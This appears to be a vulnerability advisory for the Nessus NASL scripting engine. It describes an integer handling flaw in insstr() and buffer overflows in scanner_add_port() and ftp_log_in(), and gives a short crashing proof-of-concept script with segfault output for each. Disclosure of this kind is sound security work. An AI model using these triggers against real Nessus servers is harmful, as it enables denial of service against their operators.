Details
There exists some vulnerabilities in NASL scripting engine. To exploit these flaws, an attacker would need to have a valid Nessus account as well as the ability to upload arbitrary Nessus plugins in the Nessus server (this option is disabled by default) or he/she would need to trick a user somehow into running a specially crafted nasl script.
Not that these issues can NOT be exploited by a tested host to crash nessusd remotely.
* ISSUE 1 - Integer handling vulnerability in insstr() function
Vulnerability is triggered by a negative fourth argument:
$ cat t1.nasl insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);
$ nasl t1.nasl ** WARNING : packet forgery will not work ** as NASL is not running as root [1384](t1.nasl) insstr: warning! 1st index 3 greater than 2nd index -3 Segmentation fault (core dumped)
* ISSUE 2 - Buffer overflow in scanner_add_port() function
Overflow is triggered by very long 'proto' argument:
$ cat t2.nasl scanner_add_port(port : 80, proto : crap(data:'A', length:300));
$ nasl t2.nasl ** WARNING : packet forgery will not work ** as NASL is not running as root Segmentation fault (core dumped)
* ISSUE 3 - Buffer overflow in ftp_log_in() function
Overflow is triggered by very long 'user'/'pass' arguments:
$ cat t3.nasl ftp_log_in(socket : open_sock_tcp(21), pass : "11", user: crap(data:'A',length:8192));
$ nasl t3.nasl ** WARNING : packet forgery will not work ** as NASL is not running as root Segmentation fault (core dumped) |